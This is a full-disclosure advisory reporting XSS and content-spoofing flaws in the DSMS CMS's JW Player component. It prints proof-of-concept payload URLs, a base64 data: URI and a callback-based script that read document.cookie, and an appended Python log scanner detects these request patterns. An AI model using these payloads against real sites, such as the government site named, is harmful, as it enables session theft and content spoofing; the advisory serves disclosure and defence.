Date: Sat, 15 Feb 2014 23:55:29 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: XSS and CS vulnerabilities in DSMS

Hello list!

There are Cross-Site Scripting and Content Spoofing vulnerabilities in DSMS.
This is a commercial CMS. It's used in particular at the government site
dsmsu.gov.ua, the web site of the Ministry of Youth and Sport of Ukraine.

There are also other vulnerabilities in the system, about which I've informed
the developers. None of the vulnerabilities were fixed.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of DSMS.

-------------------------
Affected vendors:
-------------------------

Strebul studio
http://strebul.com

----------
Details:
----------

Cross-Site Scripting (WASC-08):

http://site/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)

http://site/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Cross-Site Scripting (WASC-08):

If on a page of the site with jwplayer.swf (player.swf) there is a possibility
(via HTML Injection) to include JS code with a callback function, and there are
19 such functions in total, then it's possible to conduct an XSS attack. I.e.
JS callbacks can be used for an XSS attack.

Example of exploit:

<script type="text/javascript" src="jwplayer.js"></script>
<div id="container">...</div>
<script type="text/javascript">
jwplayer("container").setup({
  flashplayer: "jwplayer.swf",
  file: "1.flv",
  autostart: true,
  height: 300,
  width: 480,
  events: {
    onReady: function() { alert(document.cookie); },
    onComplete: function() { alert(document.cookie); },
    onBufferChange: function() { alert(document.cookie); },
    onBufferFull: function() { alert(document.cookie); },
    onError: function() { alert(document.cookie); },
    onFullscreen: function() { alert(document.cookie); },
    onMeta: function() { alert(document.cookie); },
    onMute: function() { alert(document.cookie); },
    onPlaylist: function() { alert(document.cookie); },
    onPlaylistItem: function() { alert(document.cookie); },
    onResize: function() { alert(document.cookie); },
    onBeforePlay: function() { alert(document.cookie); },
    onPlay: function() { alert(document.cookie); },
    onPause: function() { alert(document.cookie); },
    onBuffer: function() { alert(document.cookie); },
    onSeek: function() { alert(document.cookie); },
    onIdle: function() { alert(document.cookie); },
    onTime: function() { alert(document.cookie); },
    onVolume: function() { alert(document.cookie); }
  }
});
</script>

Content Spoofing (WASC-12):

The swf file of JW Player accepts arbitrary addresses in the parameters file and
image, which allows one to spoof the content of the flash, i.e. by setting
addresses of video (audio) and/or image files from another site.

http://site/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF

http://site/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg

The swf file of JW Player accepts arbitrary addresses in the parameter config,
which allows one to spoof the content of the flash, i.e. by setting the address
of a config file from another site (the parameters file and image in the xml
file accept arbitrary addresses). Loading the config file from another site
requires a crossdomain.xml.

http://site/templates/default/js/jwplayer/player.swf?config=1.xml

1.xml

<config>
  <file>1.flv</file>
  <image>1.jpg</image>
</config>

The swf file of JW Player accepts arbitrary addresses in the parameter
playlistfile, which allows one to spoof the content of the flash, i.e. by
setting the address of a playlist file from another site (the parameters
media:content and media:thumbnail in the xml file accept arbitrary addresses).
Loading the playlist file from another site requires a crossdomain.xml.

http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss

http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200

1.rss

<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title>Example playlist</title>
    <item>
      <title>Video #1</title>
      <description>First video.</description>
      <media:content url="1.flv" duration="5" />
      <media:thumbnail url="1.jpg" />
    </item>
    <item>
      <title>Video #2</title>
      <description>Second video.</description>
      <media:content url="2.flv" duration="5" />
      <media:thumbnail url="2.jpg" />
    </item>
  </channel>
</rss>

------------
Timeline:
------------

2013.11.04 - informed administrators of the government site. No response, no fix.
2013.11.13 - announced at my site.
2013.11.18 - informed developers about vulnerabilities in the CMS and at
dsmsu.gov.ua. They promised to fix the holes in the CMS and at the web site,
but didn't do it.
2014.02.15 - disclosed at my site (http://websecurity.com.ua/6860/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
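Added example, not part of MustLive's advisory or of DSMS: a small Python check a site operator can run over web-server access logs to spot the request shapes described above. It flags requests to player.swf / jwplayer.swf that carry a JavaScript callback flashvar (playerready) or that point one of the address-taking parameters (file, image, config, playlistfile, link) at another host or at a data:/javascript: URI, since a legitimate embed on the site only needs relative or same-host media addresses. The log lines, the host name "site" and the host "other.example" are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, unquote

# Player flashvars the advisory says accept arbitrary addresses (content spoofing)
# or a JavaScript callback name (XSS). Names are those from the advisory.
URL_PARAMS = {"file", "image", "config", "playlistfile", "link"}
CALLBACK_PARAMS = {"playerready"}
UNSAFE_SCHEMES = {"data", "javascript", "vbscript"}

PLAYER_RE = re.compile(r"/(jw)?player\.swf$", re.IGNORECASE)
# Common Log Format: ip ident user [time] "METHOD target PROTO" status size
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Constructed sample access-log lines; hosts and addresses are placeholders.
SAMPLE_LOG = """\
198.51.100.7 - - [15/Feb/2014:23:55:29 +0200] "GET /templates/default/js/jwplayer/player.swf?file=1.flv HTTP/1.1" 200 1024
198.51.100.8 - - [15/Feb/2014:23:56:01 +0200] "GET /templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie) HTTP/1.1" 200 1024
198.51.100.9 - - [15/Feb/2014:23:56:30 +0200] "GET /templates/default/js/jwplayer/player.swf?file=http://other.example/1.flv&image=http://other.example/1.jpg HTTP/1.1" 200 1024
198.51.100.10 - - [15/Feb/2014:23:57:00 +0200] "GET /templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,AAAA&file=1.jpg HTTP/1.1" 200 1024
198.51.100.11 - - [15/Feb/2014:23:57:30 +0200] "GET /index.php?page=news HTTP/1.1" 200 2048
"""


def parse_query(query):
    """Split a raw query string into decoded (name, value) pairs.

    Done by hand rather than with parse_qs so that ';' inside a data: URI
    is never treated as a pair separator.
    """
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote(name), unquote(value)))
    return pairs


def classify_value(value, own_host):
    """Return 'scheme' for data:/javascript: values, 'offsite' for absolute
    URLs on a host other than own_host, and None for harmless values."""
    parts = urlsplit(value)
    if parts.scheme.lower() in UNSAFE_SCHEMES:
        return "scheme"
    if parts.netloc and parts.netloc.lower() != own_host.lower():
        return "offsite"
    return None


def analyze_request(target, own_host):
    """Return a list of findings for one request target.

    Empty when the target is not a player request, or when every address
    parameter is relative or points at own_host.
    """
    path, _, query = target.partition("?")
    if not PLAYER_RE.search(path):
        return []
    findings = []
    for name, value in parse_query(query):
        key = name.lower()
        if key in CALLBACK_PARAMS:
            findings.append(f"js-callback:{key}")
        elif key in URL_PARAMS:
            kind = classify_value(value, own_host)
            if kind:
                findings.append(f"{kind}:{key}")
    return findings


def scan_log(text, own_host):
    """Return (client_ip, target, findings) for every suspicious log line."""
    hits = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        ip, _method, target, _status = m.groups()
        findings = analyze_request(target, own_host)
        if findings:
            hits.append((ip, target, findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG, "site"):
        print(ip, ", ".join(findings), target)
```

Run against the constructed log, the check reports the callback request and the two requests carrying foreign or data: addresses, and stays silent on the plain `file=1.flv` embed and on unrelated pages. The same `analyze_request` logic can sit in a server-side wrapper that serves the player only with vetted flashvars, which is the practical mitigation while the swf itself cannot be changed.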